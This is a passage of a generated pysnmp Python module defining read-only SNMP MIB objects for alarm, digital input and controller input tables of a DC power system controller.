if mibBuilder.loadTexts: dcPwrSysBattAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table battery alarm group.')
dcPwrSysBattAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller battery alarm group.')
dcPwrSysBattAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller battery alarm group.')
dcPwrSysBattAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller battery alarm group.')
dcPwrSysBattAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller battery alarm group.')
dcPwrSysTempAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmCount.setDescription('Number of temperature alarm variables in system controller alarm table.')
dcPwrSysTempAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2), )
if mibBuilder.loadTexts: dcPwrSysTempAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmTable.setDescription('A table of DC power system controller temperature alarm variables.')
dcPwrSysTempAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysTempAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysTempAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmEntry.setDescription('An entry into the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table temperature alarm group.')
dcPwrSysTempAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysCustomAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmCount.setDescription('Number of custom alarm variables in system controller alarm table.')
dcPwrSysCustomAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2), )
if mibBuilder.loadTexts: dcPwrSysCustomAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmTable.setDescription('A table of DC power system controller custom alarm variables.')
dcPwrSysCustomAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCustomAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysCustomAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmEntry.setDescription('An entry into the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table custom alarm group.')
dcPwrSysCustomAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller custom alarm group.')
dcPwrSysMiscAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmCount.setDescription('Number of misc alarm variables in system controller alarm table.')
dcPwrSysMiscAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2), )
if mibBuilder.loadTexts: dcPwrSysMiscAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmTable.setDescription('A table of DC power system controller misc alarm variables.')
dcPwrSysMiscAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysMiscAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysMiscAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmEntry.setDescription('An entry into the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table misc alarm group.')
dcPwrSysMiscAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller misc alarm group.')
dcPwrSysCtrlAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmCount.setDescription('The number of control alarm variables.')
dcPwrSysCtrlAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2), )
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmTable.setDescription('A table of control alarm variables.')
dcPwrSysCtrlAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCtrlAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmEntry.setDescription('An entry of the control alarm group')
dcPwrSysCtrlAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIndex.setDescription('The index of the alarm variable in the control alarm group.')
dcPwrSysCtrlAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmName.setDescription('The description of the alarm variable as reported by the control alarm group.')
dcPwrSysCtrlAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the control alarm group.')
dcPwrSysCtrlAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmStringValue.setDescription('The string value of the alarm variable as reported by the control alarm group.')
dcPwrSysCtrlAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the control alarm group.')
dcPwrSysAdioAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmCount.setDescription('Number of control alarm variables in Adio alarm table.')
dcPwrSysAdioAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2), )
if mibBuilder.loadTexts: dcPwrSysAdioAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmTable.setDescription('A table of Adio alarm variables.')
dcPwrSysAdioAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysAdioAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysAdioAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmEntry.setDescription('An entry into the Adio alarm group.')
dcPwrSysAdioAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIndex.setDescription('The index of the alarm variable in the table Adio alarm group.')
dcPwrSysAdioAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmName.setDescription('The description of the alarm variable as reported by the Adio alarm group.')
dcPwrSysAdioAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the Adio alarm group.')
dcPwrSysAdioAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmStringValue.setDescription('The string value of the alarm variable as reported by the Adio alarm group.')
dcPwrSysAdioAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the control alarm group.')
dcPwrSysConvAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmCount.setDescription('Number of Converter alarm variables in system controller alarm table.')
dcPwrSysConvAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2), )
if mibBuilder.loadTexts: dcPwrSysConvAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmTable.setDescription('A table of Converter alarm variables.')
dcPwrSysConvAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysConvAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysConvAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmEntry.setDescription('An entry into the Converter alarm group.')
dcPwrSysConvAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table Converter alarm group.')
dcPwrSysConvAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmName.setDescription('The description of the alarm variable as reported by the Converter alarm group.')
dcPwrSysConvAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the Converter alarm group.')
dcPwrSysConvAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmStringValue.setDescription('The string value of the alarm variable as reported by the Converter alarm group.')
dcPwrSysConvAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the Converter alarm group.')
dcPwrSysInvAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmCount.setDescription('Number of alarm variables in system controller alarm table')
dcPwrSysInvAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2), )
if mibBuilder.loadTexts: dcPwrSysInvAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmTable.setDescription('A table of power system controller Inv alarm variables')
dcPwrSysInvAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysInvAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysInvAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmEntry.setDescription('An entry into the power system controller Inv alarm group')
dcPwrSysInvAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmIndex.setDescription('')
dcPwrSysInvAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmName.setDescription('')
dcPwrSysInvAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmIntegerValue.setDescription('')
dcPwrSysInvAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmStringValue.setDescription('')
dcPwrSysInvAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmSeverity.setDescription('')
dcPwrSysDigIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpCount.setDescription('Number of digital input variables in system controller digital input table.')
dcPwrSysDigIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2), )
if mibBuilder.loadTexts: dcPwrSysDigIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpTable.setDescription('A table of digital input variables.')
dcPwrSysDigIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysDigIpIndex"))
if mibBuilder.loadTexts: dcPwrSysDigIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpEntry.setDescription('An entry into the digital input group.')
dcPwrSysDigIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpIndex.setDescription('The index of the digital input variable in the table digital input group.')
dcPwrSysDigIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpName.setDescription('The description of the digital input variable as reported by the digital input group.')
dcPwrSysDigIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpIntegerValue.setDescription('The integer value of the digital input variable as reported by the digital input group.')
dcPwrSysDigIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpStringValue.setDescription('The string value of the digital input variable as reported by the digital input group.')
dcPwrSysCntrlrIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpCount.setDescription('Number of controller input variables in system controller controller input table.')
dcPwrSysCntrlrIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2), )
if mibBuilder.loadTexts: dcPwrSysCntrlrIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpTable.setDescription('A table of controller input variables.')
dcPwrSysCntrlrIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCntrlrIpIndex"))
if mibBuilder.loadTexts: dcPwrSysCntrlrIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpEntry.setDescription('An entry into the controller input group.')
dcPwrSysCntrlrIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIndex.setDescription('The index of the controller input variable in the table controller input group.')
dcPwrSysCntrlrIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpName.setDescription('The description of the controller input variable as reported by the controller input group.')
